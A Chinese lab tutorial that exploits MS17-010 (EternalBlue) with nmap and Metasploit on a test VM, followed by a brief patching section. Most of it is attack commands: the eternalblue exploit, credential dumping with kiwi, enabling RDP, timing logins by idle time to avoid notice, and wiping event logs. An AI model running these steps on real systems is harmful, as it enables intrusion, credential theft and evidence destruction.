MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法

  • 前言
  • 0x01 准备工作
  • 0x02 漏洞利用
  • 0x03 修复方案
  • 总结

前言

提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。
该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。
本文将利用Metasploit工具来对此漏洞进行一次漏洞利用示范以及提出修复建议。


0x01 准备工作

  • 靶机:Windows server 2008R2(IP:192.168.178.128)
  • 攻击机:Kali 2020(IP:192.168.178.131)
  • 工具:namap(这里主要用于漏洞扫描,也可以使用nussus等其他工具)、metasploit(msf)

0x02 漏洞利用

用nmap的漏洞扫描模式

nmap --script=vuln 192.168.178.128

可以发现,靶机上扫到了4个漏洞,其中包括了MS17-010。

打开metasploit(msf很有意思的是,每次打开都会显示不同的画面。)

msfconsole


搜索ms17-010相关模块,可以看到一共找到了6个不同的模块。(选项:0-5)

search ms17-010


加载扫描模块。(选项1)

use auxiliary/scanner/smb/smb_ms17_010

查看配置选项

show options


RHOSTS显示远程主机未配置,配置目标主机。

set rhosts 192.168.178.128


开始扫描漏洞,再次证实靶机存在MS17-010漏洞。

exploit


使用永恒之蓝攻击模块:exploit/windows/smb/ms17_010_eternalblue
并设置攻击载荷:

set payload


查看选项并设置rhosts:

set rhosts 192.168.178.128


输入exploit开始攻击。

运行成功会出现meterpreter >
Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。

演示几个功能

  1. 捕获屏幕
 meterpreter > screenshot


  1. 上传/下载文件
meterpreter > upload hello.txt c://


meterpreter > download d://1.txt


  1. 远程桌面
meterpreter > run vnc

启动失败了- -好像是靶机没有启动vnc服务。

  1. 获取cmd,出现了编码问题。
meterpreter > shell

  1. 获取用户密码
meterpreter > load kiwi
Loading extension kiwi...Success.

Kiwi在32位系统中能够正常使用,到了64位系统中需要用到进程迁移
进程迁移请参考:http://hackdig.com/09/hack-144260.htm

完成进程迁移后:

meterpreter > creds_all

  1. 启用远程桌面,配合上一步获取到的密码。
meterpreter > run post/windows/manage/enable_rdp

使用时一般配合查看远程用户的空闲时长,空闲时间长再进行远程登陆,减小被发现的风险。登录rdp会把对方顶掉。

meterpreter > idletime


使用 rdesktop 命令远程连接桌面

root@kali:~# rdesktop 192.168.2.6


用上一步获取的账户密码进行登录,登录成功。

  1. 清除日志
meterpreter > clearev

清除日志前,靶机的事件查看器是这样的。(记录了大量的事件)


被清空了~

还有很多功能选项,可以自己去查一下,就不全部罗列出来了。

0x03 修复方案

受影响的系统版本可以参照:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

  • 关闭445端口。
  • 打开防火墙,安装安全软件。
  • 安装对应补丁。

总结

为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。

MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法相关推荐

  1. MS17-010永恒之蓝-漏洞利用+修复方法

    前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. 该病毒是不法分子利用NSA(National Security Agenc ...

  2. 永恒之蓝漏洞利用(MS17-010)获取shell 及获取靶机屏幕截图

    永恒之蓝漏洞利用(MS17-010) 文章目录 永恒之蓝漏洞利用(MS17-010) 一.永恒之蓝(MS17-010)介绍 二.漏洞利用 1.检测目标主机是否存在MS17-010漏洞 2.使用msf攻 ...

  3. MSF之ms17-010永恒之蓝漏洞利用

    MSF之ms17-010永恒之蓝漏洞利用 准备 扫描漏洞 漏洞攻击 准备 实验准备环境: 被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙) 攻击机:虚拟机kali ...

  4. MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

    漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:19 ...

  5. SMB协议与永恒之蓝漏洞利用

    一,SMB服务 SMB(全称为Server Message Block)是一个协议名,可用于在计算机间共享文件.打印机,串口等,电脑上的网上邻居就是靠他实现的: SMB是一个应用层协议,可以工作在NE ...

  6. 永恒之蓝漏洞利用及攻击

    一.基础知识介绍: 1.何为永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机.甚 ...

  7. 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)

    一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...

  8. 永恒之蓝漏洞利用攻击以及修复方法

    靶机:Windows 7(有的版本有补丁) 攻击机:Kali 2021 首先保证可以互相ping 通 32位系统进去控制台会蓝屏 漏洞利用 用nmap的漏洞扫描模式,扫描过程按上下方向键即可查看扫描进 ...

  9. MS17-010 漏洞利用+修复方法

    一.实验环境 Kali:192.168.100.11 Windows 7靶机:192.168.100.12 二.漏洞复现 1.信息收集 nmap端口快速扫描 利用nmap漏洞脚本进行扫描 可以发现,靶 ...

最新文章

  1. Hiberante+jpa,注解生成32字符的Id
  2. Gin加载静态html img文件
  3. RabbitMQ Header模式
  4. 游戏UI设计师怎样的作品更值钱?
  5. CCCatmullRomBy和CCPointArray
  6. swal ajax,Sweetalert详细介绍
  7. AngularJS快速入门指南03:表达式
  8. mysql 子查询 as_mysql子查询
  9. tomcat下如何才能运行shtml文件?
  10. 中文金融情感词典发布啦 | 附代码
  11. vep格式用什么播放器linux,vep格式视频用什么播放器打开
  12. 云计算中网络基础知识(升级版)
  13. 扬声器安装程序unknown,电脑无声音
  14. 所有的风只向她们吹 所有的日子都为她们破碎——査海生《四姐妹》
  15. 拯救者Y7000 (NIVIDIA GTX1054)Ubuntu 16.04无法启动问题及解决方案
  16. 心得体会标题大全_给心得起个标题
  17. 7-29 修理牧场 (25分)(PTA实验题)
  18. python中如何判断一个输入值为整数
  19. 什么是爬电距离?宽爬电距离光耦为什么越来越受大家青睐?
  20. 福彩3d开奖结果接口文档及示例分享

热门文章

  1. PowerDesigner16 活动图
  2. Java课程设计——学生基本信息管理
  3. 六、安装ExcelLibrary库
  4. ActiveMQ——基于Zookeeper搭建Replicated LevelDB集群
  5. Android获取文件夹路径
  6. was控制台管理密码重置
  7. (串口通信编程) 开源串口调试助手Common (Com Monitor)
  8. iframe分栏拖拽伸缩例子
  9. [转载]怀孕必读(非常实用)-怀胎的历程及注意事项
  10. 物联商城:物联卡车联网时代 BAT将迎来怎样的变革?